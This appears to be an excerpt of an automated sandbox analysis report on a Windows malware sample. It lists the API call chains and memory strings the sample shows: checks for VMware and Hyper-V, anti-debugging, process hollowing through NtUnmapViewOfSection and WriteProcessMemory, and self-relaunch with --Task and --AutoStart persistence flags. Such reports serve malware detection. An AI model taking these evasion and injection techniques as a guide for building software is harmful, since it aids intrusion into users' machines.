          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1850189989.0000000003300000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: var fbpkgiid = fbpkgiid || {}; fbpkgiid.page = '';;(function(BingAtWork) { if (typeof (bfbWsbTel) !== "undefined") { BingAtWork.WsbWebTelemetry.init({"cfg":{"e":true,"env":"PROD","t":"33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176"},"ig":"751E9D17E4CD42EBAA6AE59A6ED5C22A","ConversationId":"5eff9dee-03ff-465e-bf2b-c48d3d202d68","LogicalId":"33366b5b-54ef-48bf-819d-677748eae9e3","tid":"651e6ab87a454702b15a8b0357a081d8","sid":"0017FC1997EE65330FCEEFB896C06426","uid":"","muid":"A92BA4E78D2946A0AFDA5029FA43D7A8","puid":null,"isMtr":false,"tn":null,"tnid":null,"msa":false,"mkt":"en-us","b":"edge","eref":"Ref A: 651e6ab87a454702b15a8b0357a081d8 Ref B: MWHEEEAP0024FD7 Ref C: 2023-10-05T07:50:16Z","vs":{"BAW10":"BFBLCLAZYCF","BAW11":"MSBSSVLMCF","BAW5":"MSBCUSTNONALL","BAW7":"BFBPROWSBINITT1","BAW9":"BCEPREC","CLIENT":"WINDOWS","COLUMN":"SINGLE","FEATURE.BFBCREFINER":"1","FEATURE.BFBLCLAZYCF":"1","FEATURE.BFBPROWSBINIT":"1","FEATURE.BFBPROWSBINITT1":"1","FEATURE.BFBWSBCM0921CF":"1","FEATURE.MSBCUSTNONALL":"1","FEATURE.MSBSSVLMCF":"1","FEATURE.MSNSBC2":"1","FEATURE.WSBREF-T":"1","MKT":"EN-US","MS":"0","NEWHEADER":"1","THEME":"THBRAND","UILANG":"EN"},"dev":"DESKTOP","os":"WINDOWS","osver":"11","dc":"CoreUX-Prod-MWHE01","canvas":"","sci":true,"isMidgardEnabled":true,"isHomepage":false,"snrVersion":"2023.10.04.39971431"}); } })(BingAtWork || (BingAtWork = {}));;_w.rms.js({'A:rms:answers:BoxModel:Framework':'https:\/\/r.bing.com\/rb\/18\/jnc,nj\/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
          Source: 66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
          Source: 66d5df681876c_file010924.exe, 00000002.00000002.1252430363.0000000000619000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1371578979.0000000003442000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1380295777.0000000003440000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 10/03/2023 13:09:52.535OFFICECL (0x2394)0x12d8Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 11, "Time": "2023-10-03T12:09:52Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "rC2kkStHpWGLvfAgmQZRz4w5ixE=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1371578979.0000000003442000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware20,1
          Source: 66d5df681876c_file010924.exe, 00000002.00000003.1250134757.0000000000635000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000002.00000002.1252430363.00000000005D8000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000002.00000002.1252430363.0000000000635000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000002.00000003.1251377452.0000000000635000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1273669336.0000000000656000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.0000000000638000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000015.00000002.1394638850.0000000000796000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: 66d5df681876c_file010924.exe, 0000000C.00000002.2491283799.00000000006C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxI
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeAPI call chain: ExitProcess graph end nodegraph_2-45121
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_022CA71C rdtsc 0_2_022CA71C
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_00405CA9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00405CA9
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0042A57A
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,12_2_00481920
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_00408E64 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00408E64
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_022C90A3 push dword ptr fs:[00000030h]0_2_022C90A3
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_02360042 push dword ptr fs:[00000030h]0_2_02360042
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 5_2_0233F0A3 push dword ptr fs:[00000030h]5_2_0233F0A3
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 5_2_023E0042 push dword ptr fs:[00000030h]5_2_023E0042
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 6_2_022FE0A3 push dword ptr fs:[00000030h]6_2_022FE0A3
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 6_2_02390042 push dword ptr fs:[00000030h]6_2_02390042
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_004278D5 GetProcessHeap,2_2_004278D5
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_00405CA9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00405CA9
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_004071F1 SetUnhandledExceptionFilter,0_2_004071F1
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_00407D9E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00407D9E
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004329EC
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_004329BB SetUnhandledExceptionFilter,2_2_004329BB
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 5_2_00405CA9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00405CA9
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 5_2_004071F1 SetUnhandledExceptionFilter,5_2_004071F1
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 5_2_00407D9E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00407D9E
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_004329EC
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_004329BB SetUnhandledExceptionFilter,12_2_004329BB

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_02360110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_02360110
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeMemory written: C:\Users\user\Desktop\66d5df681876c_file010924.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeMemory written: C:\Users\user\Desktop\66d5df681876c_file010924.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeMemory written: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeMemory written: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeMemory written: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeMemory written: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeMemory written: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeProcess created: C:\Users\user\Desktop\66d5df681876c_file010924.exe "C:\Users\user\Desktop\66d5df681876c_file010924.exe"Jump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeProcess created: C:\Users\user\Desktop\66d5df681876c_file010924.exe "C:\Users\user\Desktop\66d5df681876c_file010924.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeProcess created: C:\Users\user\Desktop\66d5df681876c_file010924.exe "C:\Users\user\Desktop\66d5df681876c_file010924.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --TaskJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeProcess created: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 0_2_023880F6 cpuid 0_2_023880F6
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesW,EnumDateFormatsA,CreateNamedPipeA,GetProcessVersion,SetFileShortNameA,SetProcessShutdownParameters,GetCalendarInfoA,LoadLibraryW,GetModuleFileNameW,GetNumberFormatA,GetLogicalDriveStringsA,VerifyVersionInfoW,SetVolumeMountPointA,CreateHardLinkA,UnlockFile,SetCommState,GetTempPathA,_memset,CommConfigDialogW,CreateActCtxA,EnumCalendarInfoExA,GetLocaleInfoA,ReadConsoleInputW,SetVolumeMountPointA,GetConsoleAliasExesLengthW,CreateEventW,0_2_00403626
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesW,EnumDateFormatsA,CreateNamedPipeA,GetProcessVersion,SetFileShortNameA,SetProcessShutdownParameters,GetCalendarInfoA,LoadLibraryW,GetModuleFileNameW,GetNumberFormatA,GetLogicalDriveStringsA,VerifyVersionInfoW,SetVolumeMountPointA,CreateHardLinkA,UnlockFile,SetCommState,GetTempPathA,_memset,CommConfigDialogW,CreateActCtxA,EnumCalendarInfoExA,GetLocaleInfoA,ReadConsoleInputW,SetVolumeMountPointA,GetConsoleAliasExesLengthW,CreateEventW,0_2_00403628
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: GetNumberFormatA,GetLogicalDriveStringsA,VerifyVersionInfoW,SetVolumeMountPointA,CreateHardLinkA,UnlockFile,SetCommState,GetTempPathA,_memset,CommConfigDialogW,CreateActCtxA,EnumCalendarInfoExA,GetLocaleInfoA,ReadConsoleInputW,SetVolumeMountPointA,GetConsoleAliasExesLengthW,CreateEventW,0_2_00403708
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: GetNumberFormatA,SetVolumeMountPointA,GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesW,EnumDateFormatsA,CreateNamedPipeA,GetProcessVersion,SetFileShortNameA,SetProcessShutdownParameters,GetCalendarInfoA,LoadLibraryW,GetModuleFileNameW,GetNumberFormatA,GetLogicalDriveStringsA,VerifyVersionInfoW,SetVolumeMountPointA,CreateHardLinkA,UnlockFile,SetCommState,GetTempPathA,_memset,CommConfigDialogW,CreateActCtxA,EnumCalendarInfoExA,GetLocaleInfoA,ReadConsoleInputW,SetVolumeMountPointA,GetConsoleAliasExesLengthW,CreateEventW,0_2_004035E0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_023A0AB6
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_0238C8B7
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_0239394D
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_023949EA
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_02393F87
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_0043404A
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00438178
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00440116
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004382A2
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0043834F
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00438423
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: EnumSystemLocalesW,2_2_004387C8
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: GetLocaleInfoW,2_2_0043884E
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,2_2_00432B6D
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_00432FAD
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_004335E7
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_00437BB3
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: EnumSystemLocalesW,2_2_00437E27
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437E83
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437F00
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_0042BF17
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00437F83
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesW,EnumDateFormatsA,CreateNamedPipeA,GetProcessVersion,SetFileShortNameA,SetProcessShutdownParameters,GetCalendarInfoA,LoadLibraryW,GetModuleFileNameW,GetNumberFormatA,GetLogicalDriveStringsA,VerifyVersionInfoW,SetVolumeMountPointA,CreateHardLinkA,UnlockFile,SetCommState,GetTempPathA,_memset,CommConfigDialogW,CreateActCtxA,EnumCalendarInfoExA,GetLocaleInfoA,ReadConsoleInputW,SetVolumeMountPointA,GetConsoleAliasExesLengthW,CreateEventW,5_2_00403626
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesW,EnumDateFormatsA,CreateNamedPipeA,GetProcessVersion,SetFileShortNameA,SetProcessShutdownParameters,GetCalendarInfoA,LoadLibraryW,GetModuleFileNameW,GetNumberFormatA,GetLogicalDriveStringsA,VerifyVersionInfoW,SetVolumeMountPointA,CreateHardLinkA,UnlockFile,SetCommState,GetTempPathA,_memset,CommConfigDialogW,CreateActCtxA,EnumCalendarInfoExA,GetLocaleInfoA,ReadConsoleInputW,SetVolumeMountPointA,GetConsoleAliasExesLengthW,CreateEventW,5_2_00403628
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: GetNumberFormatA,GetLogicalDriveStringsA,VerifyVersionInfoW,SetVolumeMountPointA,CreateHardLinkA,UnlockFile,SetCommState,GetTempPathA,_memset,CommConfigDialogW,CreateActCtxA,EnumCalendarInfoExA,GetLocaleInfoA,ReadConsoleInputW,SetVolumeMountPointA,GetConsoleAliasExesLengthW,CreateEventW,5_2_00403708
